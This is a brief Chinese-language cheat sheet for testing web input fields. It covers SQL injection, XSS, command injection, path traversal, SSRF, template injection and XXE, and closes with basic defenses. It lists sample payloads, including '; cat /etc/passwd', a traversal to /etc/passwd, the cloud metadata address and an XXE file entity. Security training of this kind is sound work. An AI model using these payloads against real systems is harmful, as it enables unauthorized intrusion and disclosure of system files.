渗透思路输入框

输入框渗透思路:SQL注入/XSS/命令注入/路径遍历/SSRF/模板注入/XXE/JSON注入/NoSQL注入。

写在前面:合法学习边界

输入框测试只在授权测试环境进行。

一、输入框攻击思路

输入框攻击思路
1
① SQL注入 → ② XSS → ③ 命令注入 → ④ 路径遍历 → ⑤ SSRF

二、攻击方法

1
2
3
4
5
6
7
SQL注入:' OR 1=1-- · UNION SELECT · 布尔盲注
XSS:<script>alert(1)</script>
命令注入:; cat /etc/passwd
路径遍历:../../../etc/passwd
SSRF:http://169.254.169.254/
模板注入:{{7*7}} · ${{...}}
XXE:<!DOCTYPE xxe [<!ENTITY xxx SYSTEM "file:///">]>

三、防御加固

1
2
参数化查询 · 输出编码 · 输入过滤
统一异常处理 · WAF 防护

四、小结

输入框是 Web 应用最大的攻击面。输入过滤 + 输出编码 + 参数化查询是防御核心。